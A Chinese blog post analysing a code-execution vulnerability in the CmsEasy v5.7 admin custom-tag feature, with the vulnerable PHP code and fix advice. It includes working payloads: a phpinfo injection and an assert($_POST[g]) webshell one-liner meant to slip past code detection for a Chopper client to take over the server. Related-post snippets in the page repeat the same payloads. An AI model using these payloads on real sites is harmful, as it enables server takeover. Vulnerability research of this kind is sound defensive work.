【代码审计】CmsEasy_v5.7 代码执行漏洞分析

已于 2023-04-29 18:35:50 修改
阅读量2.8k 收藏 3
点赞数
文章标签: php 安全 web安全
于 2018-12-02 13:59:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/84967359
版权

 

0x00 环境准备

CmsEasy官网:http://www.cmseasy.cn/

网站源码版本:CmsEasy_v5.7_UTF8-0208

程序源码下载:

http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.7_UTF-8_20180208.zip

测试网站首页:

 

0x01 代码分析

1、漏洞文件位置:/lib/table/table_templatetagwap.php 第3-20行:

  1. class table_templatetag extends table_mode {  
  2.     function vaild() {  
  3.         if(!front::post('name')) {  
  4.             front::flash('请填写名称!');  
  5.             return false;  
  6.         }  
  7.         if(!front::post('tagcontent')) {  
  8.             front::flash('请填写内容!');  
  9.             return false;  
  10. 10.         }  
  11. 11.         return true;  
  12. 12.     }  
  13. 13.     function save_before() {  
  14. 14.         if(!front::post('tagfrom')) front::$post['tagfrom']='define';  
  15. 15.         if(!front::post('attr1')) front::$post['attr1']='0';  
  16. 16.         if(front::$post['tagcontent']) front::$post['tagcontent'] = htmlspecialchars_decode(front::$post['tagcontent']);  
  17. 17.     }  

18. }  

可以看到在写入文件之前,使用htmlspecialchars_decode函数把预定义的 HTML 实体 "<"(小于)和 ">"(大于)转换为字符。因此我们可以使用双引号闭合,从而构造出Payload写入文件,进一步触发代码,导致程序在实现上存在代码执行漏洞。攻击者可通过构造恶意脚本代码写入配置文件,从而执行命令,控制网站服务器权限。

0x02 漏洞利用

1、登录后台, 模板--自定义标签—添加自定义标签--填写Payload—提交:

Payload: 1111111111";}<?php phpinfo()?>

 

2、提交保存后,点击预览,成功触发代码,或者查看id的值,然后直接访问文件路径:http://127.0.0.1/config/tag/category_13.php

 

3、附绕代码检测的一句话Payload: 11";}<?php assert($_POST[g]);?>

 

通过菜刀连接,控制网站服务器:

 

0x03 修复建议

1、写入配置文件前,对特殊字符(如”、<、>等)进行htmlencode处理;

2、全局配置可考虑写入数据库进行调用。

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

Bypass--
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
CMSeasy v5.5任意权限getshell
08-28
CMSeasy任意权限getshell
PHP实例开发源码——鼠标拖拽可视化编辑企业网站系统CmsEasyphp版.zip
11-25
PHP实例开发源码——鼠标拖拽可视化编辑企业网站系统CmsEasyphp
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
03-05 1376
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。
CmsEasy_v5.7 代码执行漏洞复现
jie_a的博客
08-16 2025
环境安装这就不多说了,官网自己下载 CmsEasy_v5.7 我下载的6.0也能用。 首先网页长这样 然后在网址后面输入/admin进入后台登陆 登陆后台admin,admin 点击,模板–自定义标签—添加自定义标签–填写Payload—提交: Payload: 1111111111";}<?php phpinfo()?> 提交完要点击预览 附绕代码检测的一句话Payload: 11";}<?php assert($_POST[g]);?> 菜刀连接即可,他们说菜刀能连,我练
ctfshow-web477(CMS)
m0_62094846的博客
09-13 583
这个网站是用cmseasy搭建的,找一下cmseasy漏洞。网页是这样的,刚好和题目的网站对应上,版本是5.7。要进入管理界面,试一下在url后面输入admin。试用admin admin账号密码登录,成功。这里要在模块里面点编辑模块,这里没有。可能是版本不对 这里要7.3.8。1.试一下任意文件操作。再试一下代码执行漏洞
分享88个企业政府PHP源码,总有一款适合你
zy0412326的专栏
12-24 4722
PHP企业政府源码 分享88个企业政府PHP源码,总有一款适合你 链接:https://pan.baidu.com/s/1_G_zUYwTeuOXnJULMP9d2g 提取码:sqox 下面是文件的名字,我放了一些图片,文章里不是所有的图主要是放不下...,大家下载后可以看到。 SDCMS绿色通用企业网站 v2.4.2 闪灵CMS企业建站系统(含小程序) v5.0 build20211206 童装英文外贸网站系统 v2.0 易优cms企业建站系统 (含小程序) v1.5.5 HDSysCms企业建.
WebCmsEasy 漏洞复现
uuzeray的博客
11-25 1089
但p=system('xxx');却不能执行(没有disable_functions)账号密码都是admin admin,不知道为什么,这里就先当作是默认吧。在页面里post传g=phpinfo();(其实都是信息检索,能在网上搜到就行hhh)看到左边列表有模板,心里大概有数了哈。挺奇怪的,可能不是linux系统?进行一波历史漏洞的查。
【安鸾靶场】cmseasy&内网渗透 (500分)
信安是不可或缺的一部分!
10-10 889
等后面靶场重置,总体思路是这样的但是有点小问题,这个redis拿shell其实挺麻烦的,之前打靶场时也遇到过写入任务计划但没成功,我重置多次后成功了,这个运行不太好,也可能是frp的配置有问题。找了半天在:http://106.15.50.112:8021/config/tag/category_27.php。这里不能使用反弹shell方式,因为有可能192.168.112.3只有内网无外网环境:这里只能使用写入私钥方式。frp工具地址:https://github.com/fatedier/frp。
CmsEasy7.6.3.2逻辑漏洞
西电卢本伟的博客
04-22 4738
cmseasy、逻辑漏洞
cmseasy最新版任意权限getshell
HandsomeOhJie的博客
07-02 1277
http://www.2cto.com/Article/201409/334131.html
后台可以直接获取绝对路径的上传文件方法_后台getshell常用技巧总结
weixin_31091881的博客
01-26 1574
1.利用文件上传漏洞,找文件上传处想办法上传php文件。一些网站在设置可以允许修改上传的文件类型则直接添加php有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况这种情况直接上传一个.hatccess文件覆盖这个,让其失效。或者上传不重命名的话上传../../s...
CmsEasy_UTF-8.rar_CmsEasy_UTF-8_en_PHP 企业网站_企业网站_网站管理
09-20
易通(企业网站管理系统)是一款小巧,高效,人性化的企业建站程序.易通企业网站程序是国内首款免费提供模板的企业网站系统.
CmsEasy language_admin.php 后台命令执行漏洞.md
最新发布
04-08
CmsEasy language_admin.php 后台命令执行漏洞.md
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
CmsEasy crossall_act.php SQL注入漏洞.md
CmsEasy_5.6_UTF-8_20161107版本.zip
11-17
本插件系互亿无线针对CmsEasy_5.6_UTF-8_20161107版本开发,插件内的所有文件均为对原文件的修改,如果你的系统经过二次开发,安装本插件之前,请仔细核对修改。
CmsEasy代码审计1
08-03
2. 在件 lib/table/tdatabase.php 的 restoreTables 函数可以看到,file_get_contents() 函数读取件内容
2023 CmsEasyQA问答系统PHP源码
06-19 493
通过这些功能,CmsEasyQA问答系统可以激发用户创作内容,扩散有价值的信息,从而有利于品牌传播和产品营销。6.安装后,立即修改网站后台地址,登录网站后,在 [ 设置 ] - [ 全局设置 ] - [ 网站地址 ] 输入框输入自定义后台地址,可以是英文或拼音与数字,请务必不要输入符号。4.输入空间商提供的数据库信息后,自定义网站用户名和密码后,点击安装即可。
BUUCTF刷题十一道(09)
qq_45837896的博客
09-26 377
蚁剑连接无法查看flag,发现是有disable_functions限制,使用蚁剑绕过disable_functions插件。session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位)这个可以开burp扫一下,或者用dirsearch扫一下,一些url会自动跳转index.php。变量,POST优先级高于$_GET,所以这里POST传GET相应变量没字母的。解析字符串时不会进行url解码,所以可以用url编码绕过,而。
CmsEasy20160825前台无限制GetShell复现
weixin_34010949的博客
12-07 639
GetShell思路:根据里面漏洞代码直接取post数据后缀作为后缀这一特性,且CMS支持FTP。        利用FTP上传图片,通过下载上传的正常图片(已被PHP的GD库渲染)之后,        利用脚本在图片中插入payload,        再次利用FTP上传达到GET Shell的目的。 索马里师傅的post数据如下: POST /index.php?case=too...
CmsEasy逻辑漏洞报告
喜欢创作各种技术类文章,希望可以帮到你
01-25 419
一下赚了这么多钱,好开心。哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈。数量修改为-900,放包。进入商品界面,购买商品。开启抓包,然后点击购买。成功购买,查看会员中心。填写联系方式,并支付。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值